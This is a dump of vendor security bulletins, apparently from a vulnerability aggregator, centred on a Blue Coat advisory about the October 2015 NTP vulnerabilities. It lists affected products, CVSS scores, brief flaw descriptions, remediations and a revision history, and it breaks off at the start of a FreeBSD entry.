\n * Oracle Fujitsu M12-2 Server XCP 3060 \n * Oracle Fujitsu M12-2S Server XCP 2230 \n * Oracle Fujitsu M12-2S Server XCP 2290 \n * Oracle Fujitsu M12-2S Server XCP 2320 \n * Oracle Fujitsu M12-2S Server XCP 2360 \n * Oracle Fujitsu M12-2S Server XCP 3000 \n * Oracle Fujitsu M12-2S Server XCP 3050 \n * Oracle Fujitsu M12-2S Server XCP 3052 \n * Oracle Fujitsu M12-2S Server XCP 3053 \n * Oracle Fujitsu M12-2S Server XCP 3060 \n * Oracle Solaris 11.3 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of successful exploits.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nAttackers may successfully exploit client flaws in the browser through HTML-injection vulnerabilities. When possible, run all software as a user with minimal privileges and limited access to system resources. Use additional precautions such as restrictive environments to insulate software that may potentially handle malicious content. \n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to detect and block attacks and anomalous activity such as requests containing suspicious URI sequences. Since the webserver may log such requests, review its logs regularly. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2018-02-27T00:00:00", "published": "2018-02-27T00:00:00", "id": "SMNTC-103339", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/103339", "type": "symantec", "title": "NTP CVE-2018-7185 Denial of Service Vulnerability", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-24T10:41:56", "bulletinFamily": "software", "cvelist": ["CVE-2015-7691", "CVE-2015-7692", "CVE-2015-7701", "CVE-2015-7702", "CVE-2015-7703", "CVE-2015-7704", "CVE-2015-7705", "CVE-2015-7848", "CVE-2015-7849", "CVE-2015-7850", "CVE-2015-7851", "CVE-2015-7852", "CVE-2015-7853", "CVE-2015-7854", "CVE-2015-7855", "CVE-2015-7871", "CVE-2016-7704", "CVE-2017-7705", "CVE-2018-7850"], "description": "### SUMMARY\n\nBlue Coat products using affected 4.2 versions of the NTP software distribution from ntp.org are susceptible to multiple vulnerabilities. A remote attacker may exploit these vulnerabilities to cause denial of service due to application crashes, memory corruption and memory depletion. The attacker could also gain limited unauthorized write access and cause malicious code execution through a code injection attack. \n \n\n\n### AFFECTED PRODUCTS\n\nThe following products are vulnerable:\n\n**Content Analysis System** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs except CVE-2015-7705 | 2.1 and later | Not vulnerable, fixed in 2.1.1.1 \nCVE-2015-7704 | 1.3 | Upgrade to 1.3.6.1. \n1.1, 1.2 | Upgrade to later release with fixes. \nCVE-2015-7852 | 1.3 | Upgrade to 1.3.7.3. \n1.1, 1.2 | Upgrade to later release with fixes. \nAll CVEs except CVE-2015-7704, \nCVE-2015-7705, CVE-2015-7852 | 1.3 (not vulnerable to known vectors of attack) | Upgrade to 1.3.7.3 \n1.1, 1.2 (not vulnerable to known vectors of attack) | Upgrade to later release with fixes. \nCVE-2015-7705 | 2.4 and later | Not vulnerable, fixed in 2.3.5.1 \n2.3 | Upgrade to 2.3.5.1. \n1.1, 1.2, 1.3, 2.1, 2.2 | Upgrade to later release with fixes. \n \n \n\n**Director** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2015-7691, CVE-2015-7692, \nCVE-2015-7701, CVE-2015-7702, \nCVE-2015-7703, CVE-2015-7705, \nCVE-2015-7850, CVE-2015-7852 | 6.1 | Upgrade to 6.1.22.1. \n \n \n\n**Mail Threat Defense** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2015-7852 | 1.1 | Not available at this time \n \n \n\n**Management Center** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2015-7704, CVE-2015-7852 | 1.8 and later | Not vulnerable, fixed in 1.8.1.1 \n1.7 | Upgrade to 1.7.2.1. \n1.4, 1.5, 1.6 | Upgrade to later release with fixes. \nCVE-2015-7691, CVE-2015-7692, \nCVE-2015-7701, CVE-2015-7702, \nCVE-2015-7703, CVE-2015-7705, \nCVE-2015-7850 | 1.8 and later | Not vulnerable, fixed in 1.8.1.1 \n1.7 (not vulnerable to known vectors of attack) | Upgrade to 1.7.2.1. \n1.4, 1.5, 1.6 (not vulnerable to known vectors of attack) | Upgrade to later release with fixes. \n \n \n\n**Reporter** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-7704 | 10.2 and later | Not vulnerable, fixed in 10.2.1.1 \n10.1 | Upgrade to 10.1.4.1. \nCVE-2015-7852 | 10.2 and later | Not vulnerable, fixed in 10.2.1.1 \n10.1 | Upgrade to 10.1.5.1. \nCVE-2015-7691, CVE-2015-7692, \nCVE-2015-7701, CVE-2015-7702, \nCVE-2015-7703, | 10.2 and later (not vulnerable to known vectors of attack) | Not vulnerable, fixed in 10.2.1.1 \n10.1 (not vulnerable to known vectors of attack) | Upgrade to 10.1.5.1. \nCVE-2015-7705 | 10.5 | Not vulnerable, fixed in 10.5.1.1 \n10.1, 10.2, 10.3, 10.4 (not vulnerable to known vectors of attack) | A fix will not be provided. Reporter does not enable rate limiting in the NTP daemon and is not vulnerable to known vectors of attack. \nCVE-2015-7850 | 10.5 | Not vulnerable, fixed in 10.5.1.1 \n10.3, 10.4 (not vulnerable to known vectors of attack) | A fix will not be provided. Reporter does not enable remote configuration in the NTP daemon and is not vulnerable to known vectors of attack. \n10.2 (not vulnerable to known vectors of attack) | Not vulnerable, fixed in 10.2.1.1 \n10.1 (not vulnerable to known vectors of attack) | Upgrade to 10.1.5.1. \nAll CVEs | 9.4, 9.5 | Not vulnerable \n \n \n\n**Security Analytics** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2015-7691, CVE-2015-7692, \nCVE-2015-7701, CVE-2015-7702, \nCVE-2015-7703, CVE-2015-7704, \nCVE-2015-7852 | 7.2 and later | Not vulnerable, fixed in 7.2.1 \n7.1 | Upgrade to 7.1.11. \n7.0 | Upgrade to later release with fixes. \n6.6 | Upgrade to 6.6.12. \nCVE-2015-7850 | 7.3 starting with 7.3.2, 8.0 and later | A fix will not be provided. Security Analytics disables remote configuration by default in the NTP daemon. \n7.2, 7.3.1 | Not vulnerable, fixed in 7.2.1 \n7.1 | Apply patch RPM available from customer support. \n7.0 | Upgrade to later release with fixes. \n6.6 | Apply patch RPM available from customer support. \nCVE-2015-7705 | All releases | A fix will not be provided. Security Analytics disables rate limiting by default in the NTP daemon. \n \n \n\n**SSL Visibility** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2015-7705 | 4.0 and later | Not vulnerable fixed in 4.0.1.1 \nCVE-2015-7704, CVE-2015-7705, \nCVE-2015-7871 | 3.10 and later 3.x | Not vulnerable, fixed in 3.10.1.1 \n3.9 | Upgrade to 3.9.3.1. \n3.8.4FC | Upgrade to 3.8.4FC-55. \n3.8 | Upgrade to later release with fixes. \n \n \n\n**X-Series XOS** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2015-7691, CVE-2015-7692, \nCVE-2015-7701, CVE-2015-7702, \nCVE-2015-7703, CVE-2015-7705, \nCVE-2015-7850, CVE-2015-7852, \nCVE-2015-7853, CVE-2015-7855 | 11.0 | Not available at this time \n10.0 | Not available at this time \n9.7 | Upgrade to later release with fixes. \nCVE-2015-7704 | 11.0 | Not available at this time \n \n \n\nThe following products contain a vulnerable version of the NTP software distribution from ntp.org, but are not vulnerable to known vectors of attack:\n\n**Advanced Secure Gateway** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2015-7704 | 6.7 and later | Not vulnerable, fixed in 6.7.2.1 \n6.6 | Upgrade to 6.6.4.1. \nCVE-2015-7691, CVE-2015-7692, \nCVE-2015-7701, CVE-2015-7702, \nCVE-2015-7703, CVE-2015-7852 | 6.7 and later | Not vulnerable, fixed in 6.7.2.1 \n6.6 | Upgrade to 6.6.5.1. \nCVE-2015-7850 | 6.7 and later | Not vulnerable, fixed in 6.7.2.1 \n6.6 | Upgrade to 6.6.5.4. \nCVE-2015-7705 | 7.1 and later | Not vulnerable, fixed in 7.1.1.1 \n6.7 | Upgrade to 6.7.4.2. \n6.6 | A fix will not be provided. ASG does not use the NTP reference implementation for time synchronization and is not vulnerable to known vectors of attack. \n \n### \n\n### ADDITIONAL PRODUCT INFORMATION\n\nExploiting CVE-2015-7704 in Management Center requires prior social engineering or network sniffing to discover the NTP servers configured. This increases exploitation complexity and thereby reduces the CVSS v2 score. The adjusted CVSS v2 base score for CVE-2015-7704 in Management Center is:\n\n * CVE-2015-7704 - 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)\n\nIn SSL Visibility, the NTP vulnerabilities can be exploited only through the same physical network port that is used by the product's management interfaces (web UI, CLD). Limiting the machines, IP addresses and subnets able to reach this physical network port reduces the threat. Also, exploiting CVE-2015-7704 and CVE-2015-7705 in SSL Visibility requires prior social engineering or network sniffing to discover the NTP servers configured. The reduced threat and increased exploitation complexity reduces the CVSS v2 scores for each CVE. The adjusted CVSS v2 base scores and severity are:\n\n * CVE-2015-7704 - 2.9 (LOW) (AV:A/AC:M/Au:N/C:N/I:N/A:P)\n * CVE-2015-7705 - 2.9 (LOW) (AV:A/AC:M/Au:N/C:N/I:N/A:P)\n * CVE-2015-7871 - 4.8 (MEDIUM) (AV:A/AC:L/Au:N/C:N/I:P/A:P)\n\nBlue Coat products do not enable or use all functionality within the NTP software distribution from ntp.org. Products that do not utilize or enable the functionality described in a CVE are not vulnerable to that CVE. However, fixes for those CVEs will be included in the patches that are provided. The following products include vulnerable versions of the NTP software distribution, but do not use the functionality described in the CVEs and are not known to be vulnerable.\n\n * **ASG 6.6:** CVE-2015-7691, CVE-2015-7692, CVE-2015-7701, CVE-2015-7702, CVE-2015-7703, CVE-2015-7704, CVE-2015-7705, CVE-2015-7850, and CVE-2015-7852\n * **ASG 6.7:** CVE-2015-7705\n * **CAS:** CVE-2015-7691, CVE-2015-7692, CVE-2015-7701, CVE-2015-7702, CVE-2015-7703, CVE-2015-7705, and CVE-2015-7850\n * **MTD:** CVE-2015-7691, CVE-2015-7692, CVE-2015-7701, CVE-2015-7702, CVE-2015-7703, CVE-2015-7705, and CVE-2015-7850\n * **MC:** CVE-2015-7691, CVE-2015-7692, CVE-2015-7701, CVE-2015-7702, CVE-2015-7703, CVE-2015-7705, and CVE-2015-7850\n * **Reporter 10.1:** CVE-2015-7691, CVE-2015-7692, CVE-2015-7701, CVE-2015-7702, CVE-2015-7703, CVE-2015-7705, and CVE-2015-7850\n * **SSLV 3.x:** CVE-2015-7691, CVE-2015-7692, CVE-2015-7701, CVE-2015-7702, CVE-2015-7703, CVE-2015-7850, CVE-2015-7852, CVE-2015-7853, and CVE-2015-7855\n * **SSLV 4.x:** CVE-2015-7705\n\nThe following products are not vulnerable: \n**Android Mobile Agent \nAuthConnector \nBCAAA \nBlue Coat HSM Agent for the Luna SP \nCacheFlow \nClient Connector \nCloud Data Protection for Salesforce \nCloud Data Protection for Salesforce Analytics \nCloud Data Protection for ServiceNow \nCloud Data Protection for Oracle CRM On Demand \nCloud Data Protection for Oracle Field Service Cloud \nCloud Data Protection for Oracle Sales Cloud \nCloud Data Protection Integration Server \nCloud Data Protection Communication Server \nCloud Data Protection Policy Builder \nGeneral Auth Connector Login Application \nIntelligenceCenter \nIntelligenceCenter Data Collector \nK9 \nMalware Analysis Appliance \nNorman Shark Industrial Control System Protection \nNorman Shark Network Protection \nNorman Shark SCADA Protection \nPacketShaper \nPacketShaper S-Series \nPolicyCenter \nPolicyCenter S-Series \nProxyAV \nProxyAV ConLog and ConLogXP \nProxyClient \nProxySG \nUnified Agent \nWeb Isolation**\n\nBlue Coat no longer provides vulnerability information for the following products:\n\n**DLP** \nPlease, contact Digital Guardian technical support regarding vulnerability information for DLP. \n \n\n\n### ISSUES\n\n**CVE-2015-7691** \n--- \n**Severity / CVSSv2** | Medium / 4.6 (AV:N/AC:H/Au:M/C:N/I:N/A:C) \n**References** | SecurityFocus: [BID 77274](<https://www.securityfocus.com/bid/77274>) / NVD: [CVE-2015-7691](<https://nvd.nist.gov/vuln/detail/CVE-2015-7691>) \n**Impact** | Denial of service \n**Description** | A flaw allows an attacker to send authentication messages to the NTP daemon, causing the daemon to crash and resulting in denial of service. \n \n \n\n**CVE-2015-7692** \n--- \n**Severity / CVSSv2** | Medium / 4.6 (AV:N/AC:H/Au:M/C:N/I:N/A:C) \n**References** | SecurityFocus: [BID 77285](<https://www.securityfocus.com/bid/77285>) / NVD: [CVE-2015-7692](<https://nvd.nist.gov/vuln/detail/CVE-2015-7692>) \n**Impact** | Denial of service \n**Description** | A flaw allows an attacker to send authentication messages to the NTP daemon, causing the daemon to crash and resulting in denial of service. \n \n \n\n**CVE-2015-7701** \n--- \n**Severity / CVSSv2** | Medium / 4.6 (AV:N/AC:H/Au:M/C:N/I:N/A:C) \n**References** | SecurityFocus: [BID 77281](<https://www.securityfocus.com/bid/77281>) / NVD: [CVE-2015-7701](<https://nvd.nist.gov/vuln/detail/CVE-2015-7701>) \n**Impact** | Denial of service \n**Description** | A flaw allows an attacker to continuously send crafted packets to the NTP daemon, which eventually depletes its memory and causes a denial of service. \n \n \n\n**CVE-2015-7702** \n--- \n**Severity / CVSSv2** | Medium / 4.6 (AV:N/AC:H/Au:M/C:N/I:N/A:C) \n**References** | SecurityFocus: [BID 77286](<https://www.securityfocus.com/bid/77286>) / NVD: [CVE-2015-7702](<https://nvd.nist.gov/vuln/detail/CVE-2015-7702>) \n**Impact** | Denial of service \n**Description** | A flaw allows an attacker to send authentication messages to the NTP daemon, causing the daemon to crash and resulting in denial of service. \n \n \n\n**CVE-2015-7703** \n--- \n**Severity / CVSSv2** | Medium / 6.2 (AV:N/AC:H/Au:M/C:N/I:C/A:C) \n**References** | SecurityFocus: [BID 77278](<https://www.securityfocus.com/bid/77278>) / NVD: [CVE-2015-7703](<https://nvd.nist.gov/vuln/detail/CVE-2015-7703>) \n**Impact** | Unauthorized modification of data \n**Description** | A flaw allows an attacker to send configuration requests to the NTP daemon, causing the daemon to potentially overwrite internal files. \n \n \n\n**CVE-2015-7704** \n--- \n**Severity / CVSSv2** | Medium / 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77280](<https://www.securityfocus.com/bid/77280>) / NVD: [CVE-2015-7704](<https://nvd.nist.gov/vuln/detail/CVE-2015-7704>) \n**Impact** | Denial of service \n**Description** | A flaw allows an attacker to send Kiss-of-Death packets to the NTP daemon, causing it to stop its communication with a remote NTP server. The attacker must know the remote servers that the NTP daemon is communicating with. \n \n \n\n**CVE-2015-7705** \n--- \n**Severity / CVSSv2** | Medium / 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77284](<https://www.securityfocus.com/bid/77284>) / NVD: [CVE-2015-7705](<https://nvd.nist.gov/vuln/detail/CVE-2015-7705>) \n**Impact** | Denial of service \n**Description** | A flaw allows an attacker to send Kiss-of-Death packets to the NTP daemon, causing it to rate limit its communication with a remote NTP server. The attacker must know the remote servers that the NTP daemon is communicating with. \n \n \n\n**CVE-2015-7848** \n--- \n**Severity / CVSSv2** | Medium / 4.6 (AV:N/AC:H/Au:M/C:N/I:N/A:C) \n**References** | SecurityFocus: [BID 77275](<https://www.securityfocus.com/bid/77275>) / NVD: [CVE-2015-7848](<https://nvd.nist.gov/vuln/detail/CVE-2015-7848>) \n**Impact** | Denial of service \n**Description** | A flaw allows an attacker to send crafted query requests to the NTP daemon, causing the daemon to crash and resulting in a denial of service. \n \n \n\n**CVE-2015-7849** \n--- \n**Severity / CVSSv2** | Medium / 6.8 (AV:N/AC:H/Au:M/C:C/I:C/A:C) \n**References** | SecurityFocus: [BID 77276](<https://www.securityfocus.com/bid/77276>) / NVD: [CVE-2015-7849](<https://nvd.nist.gov/vuln/detail/CVE-2015-7849>) \n**Impact** | Denial of service, code execution \n**Description** | A flaw allows an attacker to send crafted configuration requests to the NTP daemon, causing the daemon to crash or execute malicious code. \n \n \n\n**CVE-2015-7850** \n--- \n**Severity / CVSSv2** | Medium / 4.6 (AV:N/AC:H/Au:M/C:N/I:N/A:C) \n**References** | SecurityFocus: [BID 77279](<https://www.securityfocus.com/bid/77279>) / NVD: [CVE-2015-7850](<https://nvd.nist.gov/vuln/detail/CVE-2015-7850>) \n**Impact** | Denial of service \n**Description** | A flaw allows an attacker to send crafted configuration requests to the NTP daemon, causing the daemon to crash or create a large log file, and resulting in a denial of service. \n \n \n\n**CVE-2015-7851** \n--- \n**Severity / CVSSv2** | Medium / 5.2 (AV:N/AC:H/Au:M/C:N/I:P/A:C) \n**References** | SecurityFocus: [BID 77282](<https://www.securityfocus.com/bid/77282>) / Red Hat: [CVE-2015-7851](<https://access.redhat.com/security/cve/cve-2015-7851>) \n**Impact** | Unauthorized modification of data \n**Description** | A flaw allows an attacker to send crafted configuration requests to the NTP daemon running on the VMS operating system, and cause the daemon to overwrite internal files. \n \n \n\n**CVE-2015-7852** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:H/Au:N/C:N/I:P/A:P) \n**References** | SecurityFocus: [BID 77288](<https://www.securityfocus.com/bid/77288>) / NVD: [CVE-2015-7852](<https://nvd.nist.gov/vuln/detail/CVE-2015-7852>) \n**Impact** | Denial of service \n**Description** | A flaw allows an attacker to sent crafted query responses to the ntpq query tool and cause ntpq to crash. \n \n \n\n**CVE-2015-7853** \n--- \n**Severity / CVSSv2** | Medium / 5.9 (AV:L/AC:H/Au:M/C:C/I:C/A:C) \n**References** | SecurityFocus: [BID 77273](<https://www.securityfocus.com/bid/77273>) / NVD: [CVE-2015-7853](<https://nvd.nist.gov/vuln/detail/CVE-2015-7853>) \n**Impact** | Code execution, denial of service \n**Description** | A flaw allows an attacker to cause a buffer overflow in the NTP daemon through a malicious reference clock driver. The buffer overflow can result in malicious code execution, or in a memory corruption and denial of service. \n \n \n\n**CVE-2015-7854** \n--- \n**Severity / CVSSv2** | Medium / 6.8 (AV:N/AC:H/Au:M/C:C/I:C/A:C) \n**References** | SecurityFocus: [BID 77277](<https://www.securityfocus.com/bid/77277>) / NVD: [CVE-2015-7854](<https://nvd.nist.gov/vuln/detail/CVE-2015-7854>) \n**Impact** | Denial of service \n**Description** | A flaw allows an attacker to send crafted configuration requests to the NTP daemon, causing the daemon to crash and resulting in a denial of service. \n \n \n\n**CVE-2015-7855** \n--- \n**Severity / CVSSv2** | Medium / 4.6 (AV:N/AC:H/Au:M/C:N/I:N/A:C) \n**References** | SecurityFocus: [BID 77283](<https://www.securityfocus.com/bid/77283>) / NVD: [CVE-2015-7855](<https://nvd.nist.gov/vuln/detail/CVE-2015-7855>) \n**Impact** | Denial of service \n**Description** | A flaw allows an attacker to send crafted query requests to the NTP daemon, causing the daemon to crash and resulting in a denial of service. \n \n \n\n**CVE-2015-7871** \n--- \n**Severity / CVSSv2** | Medium / 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P) \n**References** | SecurityFocus: [BID 77287](<https://www.securityfocus.com/bid/77287>) / NVD: [CVE-2015-7871](<https://nvd.nist.gov/vuln/detail/CVE-2015-7871>) \n**Impact** | Unauthorized modification of system time \n**Description** | A flaw allows an attacker to send crypto-NAK messages to the NTP daemon, causing the daemon to synchronize the system time to a malicious time server without authenticating it. \n \n### \nMITIGATION\n\nThese vulnerabilities can be exploited only through the management network port for CAS, Director, Management Center, Reporter 10.1, and X-Series XOS. Allowing only machines, IP addresses and subnets from a trusted network to access to the management network port reduces the threat of exploiting the vulnerabilities.\n\nBy default, Director, Security Analytics and X-Series XOS do not enable the rate limiting, autokey, remote configuration, remote querying, and custom reference clock features in their NTP software. X-Series XOS also does not enable rate limiting. Customers who leave these NTP features disabled prevent attacks against these products using the following vulnerabilities:\n\n * Director: CVE-2015-7691, CVE-2015-7692, CVE-2015-7701, CVE-2015-7702, CVE-2015-7703, and CVE-2015-7850.\n * Security Analytics: CVE-2015-7691, CVE-2015-7692, CVE-2015-7701, CVE-2015-7702, CVE-2015-7703, CVE-2015-7705, and CVE-2015-7850.\n * X-Series XOS: CVE-2015-7691, CVE-2015-7692, CVE-2015-7701, CVE-2015-7702, CVE-2015-7703, CVE-2015-7705, CVE-2015-7850, CVE-2015-7853, and CVE-2015-7855.\n\n### REFERENCES\n\nNTP Project Security Notice - <https://support.ntp.org/bin/view/Main/SecurityNotice> \n \n\n\n### REVISION\n\n2020-04-26 A fix for CVE-2015-7705 in ASG 6.7 is available in 6.7.4.2. ASG 7.1 and later versions are not vulnerable because a fix is available in 7.1.1.1. \n2020-04-20 A fix for CVE-2015-7705 in CA 2.3 is available in 2.3.5.1. CA 2.4 is not vulnerable because a fix is available in 2.4.1.1. Reporter 10.5 is not vulnerable because a fix is available in 10.5.1.1. Fixes for CVE-2018-7850 in Security Analytics 7.3, 8.0, and 8.1 will not be provided. Security Analytics be default does not enable remote configuration in the NTP daemon. Customers who leave remote configuration disabled prevent attacks using CVE-2015-7850 against Security Analytics. Advisory status moved to Closed. \n2020-04-18 Security Analytics 8.1 is vulnerable to CVE-2018-7850. \n2019-10-02 Web Isolation is not vulnerable. \n2019-08-29 Reporter 10.3 and 10.4 have vulnerable versions of the NTP software distribution from ntp.org for CVE-2015-7705 and CVE-2015-7850, but are not vulnerable to known vectors vectors of attack. Fixes for CVE-2015-7705 and CVE-2015-7850 will not be provided for Reporter 10.3 and 10.4. \n2019-01-20 SA 7.3 starting with 7.3.2 and 8.0 are vulnerable to CVE-2015-7850. A fix for CVE-2015-7705 in SA 8.0 will not be provided. Rate limiting is disabled by default in the NTP daemon. \n2019-01-18 SSLV 4.x is not vulnerable to CVE-2015-7705 because a fix is available in 4.0.1.1. \n2019-01-14 A fix for CVE-2015-7705 for MC 1.x is available in 1.7.2.1. \n2018-04-22 CAS 2.3 has a vulnerable version of the NTP software distribution from ntp.org, but is not vulnerable to known vectors of attack. \n2017-11-08 CAS 2.2 has a vulnerable version of NTP software distribution from ntp.org for CVE-2015-7705, but is not vulnerable to known vectors of attack. A fix for CVE-2015-7705 in CAS 2.2 will not be provided. CAS 2.2 does not enable rate limiting in the NTP daemon and is not vulnerable to known vectors of attack. \n2017-11-07 MC 1.8 and later releases have a vulnerable version of NTP software distribution from ntp.org for CVE-2015-7705. A fix will not be provided. MC does not enable rate limiting in the NTP daemon and is not vulnerable to known vectors of attack. \n2017-11-06 ASG 6.7 has a vulnerable version of the NTP software distribution from ntp.org for CVE-2015-7705. Fixes will not be provided. ASG 6.7 does not use the NTP software distribution from ntp.org for time synchronization and is not vulnerable to known vectors of attack for CVE-2015-7705. \n2017-11-04 It was previously reported that SSLV 4.0 and 4.1 are not vulnerable. Futher investigtion indicates that SSLV 4.x has a vulnerable version of the NTP software distribution from ntp.org for CVE-2015-7705. Fixes will not be provided. SSLV 4.x does not enable rate limiting in the NTP daemon and is not vulnerable to known vectors of attack. \n2017-08-02 SSLV 4.1 is not vulnerable. \n2017-07-20 MC 1.10 has a vulnerable version of NTP software distribution from ntp.org for CVE-2015-7705, but is not vulnerable to known vectors of attack. A fix for CVE-2015-7705 in MC 1.9 will not be provided. MC 1.9 does not enable rate limiting in the NTP daemon and is not vulnerable to known vectors of attack. \n2017-07-14 A fix for CVE-2017-7705 will not be provided for ASG, CAS, MC, Reporter, and Security Analytics. ASG does not use the NTP reference implementation for time synchronization. CAS, MC, and Reporter do not enable rate limiting in the NTP daemon. Thus, these products are not vulnerable to known vectors of attack for CVE-2017-7705. Security Analytics does not enable rate limiting by default in the NTP daemon. Customers who keep it disabled prevent attacks against Security Analytics using CVE-2015-7705. \n2017-06-22 A fix for all CVEs in Security Analytics 7.2 is available in 7.2.2. Security Analytics 7.3 is not vulnerable. \n2017-05-17 CAS 2.1 is not vulnerable. \n2017-03-30 MC 1.8 and 1.9 have a vulnerable version of NTP software distribution from ntp.org for CVE-2015-7705, but are not vulnerable to known vectors of attack. \n2017-03-29 A fix for all CVEs except CVE-2015-7705 in ASG 6.6 is available in 6.6.5.4. \n2017-03-08 A fix for Director is available in 6.1.22.1. \n2017-03-06 SSLV 4.0 is not vulnerable. Vulnerability inquiries for DLP should be addressed to Digital Guardian technical support. \n2017-01-24 A fix for all CVEs except CVE-2015-7705 in CAS 1.3 is available in 1.3.7.3. \n2017-01-10 A fix for all CVEs except CVE-2015-7705 in Reporter 10.1 is available in 10.1.5.1. \n2016-12-04 SSLV 3.11 is not vulnerable. \n2016-11-17 Cloud Data Protection for Oracle Field Service Cloud is not vulnerable. \n2016-11-14 A fix for all CVEs except CVE-2015-7705 in MC 1.7 is available in 1.7.2.1. \n2016-11-11 SSLV 3.10 is not vulnerable. \n2016-09-22 MC 1.6 and 1.7 are vulnerable to CVE-2015-7852. Fixes for MC 1.5 and 1.6 will not be provided. Please upgrade to the latest version with the vulnerability fix. \n2016-09-01 A fix for SSLV 3.8.4FC is available in 3.8.4FC-55. \n2016-08-12 A fix for all CVEs except CVE-2015-7705 in Security Analytics is available in 7.2.1. A fix for CVE-2015-7705 will not be provided. Rate limiting is disabled by default in the Security Analytics NTP software. Customers who keep it disabled prevent attacks using CVE-2015-7705. \n2016-07-18 A fix for CVE-2015-7850 in Security Analytics 6.6 and 7.1 is available through a patch RPM from customer support. A fix for CVE-2015-7705 will not be provided. Rate limiting is disabled by default in the Security Analytics NTP software. Customers who keep it disabled prevent attacks using CVE-2015-7705. \n2016-06-23 A fix for CVE-2015-7704 is available in ASG 6.6.4.1. \n2016-06-16 PolicyCenter S-Series is not vulnerable. \n2016-05-17 Fixes for all CVEs except CVE-2015-7705 and CVE-2015-7850 are available in Security Analytics 6.6.12 and 7.1.11. Previously it was reported that Security Analytics 6.6, 7.0, and 7.1 are vulnerable to CVE-2015-7848, CVE-2015-7849, CVE-2015-7853, CVE-2015-7854, and CVE-2015-7855. Further investigation indicates that Security Analytics is not vulnerable to these CVEs. \n2016-05-11 No Cloud Data Protection products are vulnerable. \n2016-04-23 MTD 1.1 is vulnerable to CVE-2015-7852. It also has vulnerable code for CVE-2015-7691, CVE-2015-7692, CVE-2015-7701, CVE-2015-7702, CVE-2015-7703, CVE-2015-7705, and CVE-2015-7850, but it not vulnerable to known vectors of attack. \n2016-04-21 Previously it was reported that Director is vulnerable to CVE-2015-7853 and CVE-2015-7855. It was also reported that CAS, MC, and Reporter 10.1 have vulnerable code for CVE-2015-7853 and CVE-2015-7855. New information indicates that CAS, Director, MC, and Reporter 10.1 are not vulnerable to these CVEs. \n2016-04-15 Previously it was reported that CAS 1.x and Reporter 10.1 are vulnerable to CVE-2015-7705. New information indicates that CAS 1.x and Reporter 10.1 have vulnerable code, but do not enable NTP rate limiting and are not vulnerable to known vectors of attack. \n2016-04-01 A fix for CVE-2015-7704 in Reporter 10.1 is available in 10.1.4.1. Reporter 9.4 and 9.5 are not vulnerable. \n2016-03-14 A fix for CVE-2015-7704 in CAS 1.3 is available in 1.3.6.1. \n2016-02-12 A fix for MC 1.4 will not be provided. Please upgrade to the latest version that has the vulnerability fix. \n2016-02-11 Clarified that only Reporter 10.1 is vulnerable or has vulnerable code for the NTP vulnerabilities addressed in this Security Advisory. Reporter 9.4 and 9.5 are not vulnerable. \n2016-02-04 New information indicates that X-Series XOS by default does not enable rate limiting in its NTP daemon. Customers who leave rate limiting disabled prevent attacks against XOS using CVE-2015-7705. \n2016-01-22 A fix for SSLV 3.9 is available. A fix for SSLV 3.8 will not be provided. \n2016-01-15 Previously, it was reported that MC 1.4 is vulnerable to CVE-2015-7705. New information has shown that MC 1.4 has vulnerable code, but does not use the vulnerable functionality, and so is not known to be vulnerable. A new release MC 1.5 is vulnerable to CVE-2015-7852. \n2015-12-21 CAS, MC, Reporter 10.1, and SSLV have vulnerable NTP software, but do not use the vulnerable functionality and are not known to be vulnerable. The vulnerable software will be patched in future releases. \n2015-12-09 Reporter 10.1 is vulnerable. \n2015-12-07 PacketShaper S-Series is not vulnerable. \n2015-12-01 Blue Coat HSM Agent for the Luna SP is not vulnerable. \n2015-11-24 initial public release\n", "modified": "2020-04-26T18:28:15", "published": "2015-11-24T08:00:00", "id": "SMNTC-1335", "href": "", "type": "symantec", "title": "SA103 : October 2015 NTP Security Vulnerabilities", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "freebsd": [{"lastseen": "2020-06-19T13:30:39", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7703", "CVE-2015-7855", "CVE-2015-7704", "CVE-2015-7701", "CVE-2015-7848", "CVE-2015-7692", "CVE-2015-7851", "CVE-2015-7702", "CVE-2015-7852", "CVE-2015-7871", "CVE-2015-7849", "CVE-2015-7691", "CVE-2015-7705", "CVE-2015-7850", "CVE-2015-7854", "CVE-2015-7853"], "description": "\nntp.org reports:\n\nNTF's NTP Project has been notified of the following 13 low-\n\t and medium-severity vulnerabilities that are fixed in\n\t ntp-4.2.8p4, released on Wednesday, 21 October 2015:\n\nBug 2941 CVE-2015-7871 NAK to the Future: Symmetric\n\t\tassociation authentication bypass via crypto-NAK\n\t\t(Cisco ASIG)\nBug 2922 CVE-2015-7855 decodenetnum() will ASSERT botch\n\t\tinstead of returning FAIL on some bogus values (IDA)\nBug 2921 CVE-2015-7854 Password Length Memory Corruption\n\t\tVulnerability. (Cisco TALOS)\nBug 2920 CVE-2015-7853 Invalid length data provided by a\n\t\tcustom refclock driver could cause a buffer overflow.\n\t\t(Cisco TALOS)\nBug 2919 CVE-2015-7852 ntpq atoascii() Memory Corruption\n\t\tVulnerability. (Cisco TALOS)\nBug 2918 